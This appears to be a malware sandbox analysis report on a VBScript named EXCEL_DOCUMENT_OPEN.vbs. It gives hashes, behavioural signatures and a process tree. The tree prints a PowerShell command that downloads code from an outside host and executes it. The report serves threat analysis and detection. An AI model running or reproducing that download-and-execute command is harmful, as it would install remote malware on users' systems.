Resubmissions
12/08/2024, 11:41    240812-ntgelazapr    8
08/05/2024, 15:00    240508-sdtr7sab2w    8
05/04/2024, 15:07    240405-shpdaafc3v    10
04/04/2024, 20:19    240404-y3t26aaa37    10
Analysis
max time kernel: 118s
max time network: 122s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 04/04/2024, 20:19
Static task: static1
Behavioral task: behavioral1
  Sample: EXCEL_DOCUMENT_OPEN.vbs
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: EXCEL_DOCUMENT_OPEN.vbs
  Resource: win10-20240404-en
General
Target: EXCEL_DOCUMENT_OPEN.vbs
Size: 23KB
MD5: 6925ed4c3665b27592c356b0bbd4948d
SHA1: 7429a3929f68c87af85266c5d304f3e26e11a8c0
SHA256: 5237e653da5478c91e1de3d51a9713753b4bc1b4c9be8e9136cd9d94e216ae77
SHA512: 333ffd943ea86e75822f6c59412fe12b77f95ddeffd1f0286606faab19b595b27b528457158cc6afe2dcb75455ce9e1fb012ddf171f895135fc90e9d249599b6
SSDEEP: 384:J0Y5Y65Go4F0yNWe037NwNAUihUN+0X2RyiUiK3xYUif3JNB6Bcy:hYFFFNWe037NwNAUiKNIRyiUiK3xYUi2
Malware Config
Signatures
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid    Process
  2840   powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description               pid    Process
  Token: SeDebugPrivilege   2840   powershell.exe
Suspicious use of WriteProcessMemory (3 IoCs)
  description                        pid    Process       procid_target
  PID 2224 wrote to memory of 2840   2224   WScript.exe   28
  PID 2224 wrote to memory of 2840   2224   WScript.exe   28
  PID 2224 wrote to memory of 2840   2224   WScript.exe   28
Processes
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EXCEL_DOCUMENT_OPEN.vbs"
  PID: 2224
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'irreceiver.com/lcyqeksm')
    PID: 2840
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken